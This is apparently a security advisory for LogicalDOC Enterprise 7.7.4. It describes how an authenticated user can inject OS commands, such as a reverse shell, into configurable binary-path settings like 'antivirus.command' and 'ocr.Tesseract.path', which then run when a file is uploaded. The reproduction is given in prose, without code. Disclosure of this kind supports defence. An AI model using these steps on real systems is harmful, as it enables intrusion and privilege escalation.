LogicalDOC Enterprise OS Command Execution Vulnerability Allowing Privilege Escalation

A vulnerability in LogicalDOC Enterprise version 7.7.4 allows authenticated users to execute arbitrary operating system commands with elevated privileges. This is achieved by manipulating the binary paths of various system settings, such as antivirus commands and OCR Tesseract paths. The vulnerability could lead to unauthorized access to system resources or execution of malicious commands, depending on the platform.

Impact

Exploitation of this vulnerability could result in unauthorized OS command execution, with potential for privilege escalation to root or SYSTEM, depending on the operating system.

Reproduction

To reproduce this vulnerability, log into LogicalDOC Enterprise 7.7.4 and navigate to the settings management feature. Once there, modify the 'antivirus.command' or 'ocr.Tesseract.path' parameters to include a command payload, such as a reverse shell command. After saving the settings, the injected command will be executed when a file is uploaded that matches the specified criteria. This vulnerability can also be reproduced by using the 'command.convert', 'command.openssl', 'command.gs', 'command.pdftohtml', or 'command.keytool' parameters to execute commands and retrieve their output.